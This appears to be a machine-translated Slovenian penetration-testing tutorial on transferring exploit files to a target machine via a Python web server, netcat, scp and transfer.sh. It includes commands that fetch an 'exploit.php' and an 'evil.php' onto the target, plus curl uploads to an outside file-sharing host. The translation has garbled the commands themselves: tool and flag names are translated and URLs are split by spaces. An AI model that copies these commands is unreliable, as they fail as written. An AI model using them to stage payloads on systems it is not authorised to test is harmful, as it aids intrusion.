Phenquestions
Med testiranjem penetracije so pogosto potrebni prenos podvigov, skripti python in nalagalni moduli. Ker je terminal orodje, ki se večinoma uporablja, je bistvenega pomena za razumevanje osnov prenosa datotek.
Preizkuševalnik pisala mora biti dobro opremljen z različnimi triki za prenos datotek z oddaljenega strežnika in tudi iz enega imenika v drugega. V tej vadnici bomo razpravljali o različnih načinih prenosa datotek z uporabo ukazne vrstice.
1. Python strežnik
Python je osnovni paket, ki je prednameščen v skoraj vseh sistemih, ki temeljijo na Debianu. Če želite datoteko prenesti iz ene naprave v drugo, naredite naslednje;
Python2:
Preklopite v imenik, v katerem obstaja datoteka, ki jo želite prenesti. Zaženite preprost strežnik python. Vnesite naslednji ukaz;
$ python -m SimpleHTTPServer 8080
Zdaj pojdite na stroj, kamor želite prenesti datoteko. Za prenos datoteke uporabite naslednji ukaz;
$ wget http: // 192.168.43.177: 8080 / datoteka
Ne pozabite zamenjati IP-ja, številke vrat in imena datoteke.
Python3:
Vse, kar je zapisano v python2, se bo skoraj vedno zlomilo v python3. Preučimo tudi, kako prenesti datoteko s pomočjo python3.
V primeru python3 vnesite naslednji ukaz za zagon preprostega strežnika python.
$ python3 -m http.strežnik 8080
Če želite datoteko prenesti na cilj, vnesite naslednji ukaz;
$ wget http: // 192.168.43.177: 8080 / izkoriščanje.php
2. Netcat
Netcat je zmogljiv pripomoček za prenos datotek s katerega koli oddaljenega računalnika na lokalni računalnik. Morda ni vedno nameščen. Ali obstaja ali ne, lahko preverite z vnosom;
$ ki netcat
Druga možnost je, da vnesete;$ ki nc
Naredite strežnik netcat z naslednjim ukazom;
$ nc -nlvp 8080 < evil.php
Zdaj pojdite na ciljni računalnik in vnesite naslednje, da prenesete datoteko;
$ nc -nv 192.168.43.177 8080> zlo.php
Zamenjati nc s netcat v zgornjih ukazih, če nc ne deluje ali ni pravilno nameščen.
3. SCP
Protokol za varno kopiranje je močno orodje za prenos datotek. Pride še posebej, če želite prenesti imenike. Večinoma se uporablja tudi za prenos datotek prek ssh.
Za prenos datoteke prek ssh vnesite naslednji ukaz na pošiljatelju;
$ scp -i novo.test pem.py ubuntu @ 18.220.68.229: / home / ubuntu
Kje -i predstavlja javni ključ za prijavo ssh, test.py je datoteka za prenos in / home / ubuntu je ciljni imenik, kamor želimo datoteko shraniti.
Če želite prenesti datoteko z oddaljene naprave, vnesite naslednji ukaz;
$ scp root @ 192.168.43.177: / remote_directory / file / local / directory
4. Prenos.sh
To orodje drugega proizvajalca lahko uporabite za prenos datotek. To je lahko koristno, če nimate naprave z javnim IP-jem in morate še vedno prenesti datoteke. Naslednji ukaz prenese datoteko v prenos.strežniki sh;
$ curl --upload-datoteka ./mapa.txt https: // prenos.sh / datoteka.txt
Če želite prenesti datoteko, vnesite naslednji ukaz;
$ curl https: // prenos.sh // datoteka.txt -o.txt
Prenos.sh je še v fazi razvoja in morda ne bo vedno deloval.
Zaključek
Orodja ukazne vrstice nam omogočajo prenos datotek na različne načine. Morda se zdijo nekoliko zapleteni, vendar njihovo praktično uporabo omogoča enostavno upravljanje datotek, zlasti kadar možnost GUI ni na voljo.
